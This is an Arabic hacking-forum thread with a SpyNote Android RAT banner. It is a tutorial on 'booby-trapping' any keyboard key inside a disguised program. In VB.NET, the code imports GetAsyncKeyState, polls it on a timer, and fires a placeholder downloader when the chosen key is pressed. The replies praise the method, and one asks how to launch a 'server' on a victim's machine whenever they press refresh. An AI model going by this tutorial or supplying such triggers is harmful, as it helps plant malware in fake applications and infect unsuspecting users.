1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

تلغيم اي زر من ازرار الكيبورد

الموضوع في 'حماية الأجهزة' بواسطة لاذكروني الجبوري, بتاريخ ‏17 مايو 2014.

كاتب الموضوع : لاذكروني الجبوري المشاهدات : 660 الردود : 7 ‏17 مايو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    لاذكروني الجبوري <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏27 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    ٱهلٱ وِسًهلٱ بّكم ٱعضٱء وِزوِٱر (عراق تيم) ٱلكرٱم

    ٱلكل شّٱهدُ تُلغّيّمة - CapsLock

    وِهيّ عنٌدُ ٱلضغّطٌ على هذٌٱ ٱلزر تُعمل ٱلتُلغّيّمة

    ٱلمهم ٱلٱعضٱء ٱلكثًيّر منٌۂم طٌلبّ طٌريّقَة تُلغّيّم ٱيّ زر منٌ ٱلكيّبّوِردُ

    يّريّدُ

    مثًلٱ عنٌدُ ٱلضغّطٌ علىى ٱنٌتُر ٱوِ حًرفُ a ٱوِ n ٱوِ shift ٱلخٌ ..

    ٱيّ زر فُيّ بّٱلك فُيّ ٱلكيّبّوِردُ !

    [​IMG]


    ٱلمۂم لدُيّنٌٱ مشّروِع جَٱهز وِليّكنٌ بّرنٌٱمجَ تُشّفُيّر نٌريّدُ تُلغّيّمه

    دُبّل كلك على ٱيّ مكٱنٌ منٌ ٱلفُوِرم

    وِنٌضع تُٱيّمر وِٱحًدُ

    [​IMG]

    نكتب تحت - Public Class Form1

    <System.Runtime.InteropServices.DllImport("user32")> _

    Public Shared Function GetAsyncKeyState(ByVal AlBrazele As System.Windows.Forms.Keys) As Short

    End Function



    ثًم دُبّل كلك على ٱلتُٱيّمر وِنٌكتُبّ

    Dim brazele As Boolean

    brazele = GetAsyncKeyState(Keys.A)

    If brazele Then

    '' Downloader Code Here

    End If

    End Sub



    نٌسًتُبّدُل كلمة - Keys.a

    بّٱيّ حًرفُ نٌريّدُ نٌجَعلۂٱ مثًلٱ Keys.n

    ٱلخٌ ..

    ٱعمل بّلدُ وِمبّروِك عليّك i:q^:

    موِفُقَيّنٌ
    [​IMG]

    i:q^:

    أنتضرو المزيد
    &:":
    لاتنسو التقيم
    !!:{
    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    isdo213 isdo213
    Developer

    عضو منذ:
    ‏16 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Web Developer
    الإقامة:

    رد: تلغيم اي زر من ازرار الكيبورد

    شكرا حبيبي وجزاك الله خيرا :{1}::{1}:
     


  3. غير متصل

    KaDiM aL-iRaQi ExpertDeveloper
    ExpErt DeveloPer

    عضو منذ:
    ‏2 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:

    رد: تلغيم اي زر من ازرار الكيبورد

    بارك الله بيك شرح روعه
     


  4. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,778
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: تلغيم اي زر من ازرار الكيبورد

    أحسنت أخوي
    بارك الله بيك
    %:"
     


  5. غير متصل

    الأوكراني <div class="smal22">.:: غير موثوق ::.</div>
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏22 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: تلغيم اي زر من ازرار الكيبورد

    وعليكم السلام فكره جيده تقريباا ذكيه لاكن هل تقدر تلغم زر رفريش ؟ كلك ايمن عند عمل رفرش يعمل السيرفر بدون داون لودر يعني لو السيرفر موجود في جهاز الضحيه وابي اشغله كل ما بيضغط رفرش هل يمكن ؟؟*:*:
     


  6. غير متصل

    slaizer مشرف أختبار الأختراق
    V • I • P

    عضو منذ:
    ‏29 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    558
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: تلغيم اي زر من ازرار الكيبورد

    [​IMG][​IMG][​IMG][​IMG]
     


  7. غير متصل

    ~iRaQi-Hacker~
    rank
    Developer

    عضو منذ:
    ‏7 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيم اي زر من ازرار الكيبورد

    مبدع عمري [​IMG]
     


  8. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: تلغيم اي زر من ازرار الكيبورد

    بطل بطل بطل
    {1!$8}
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...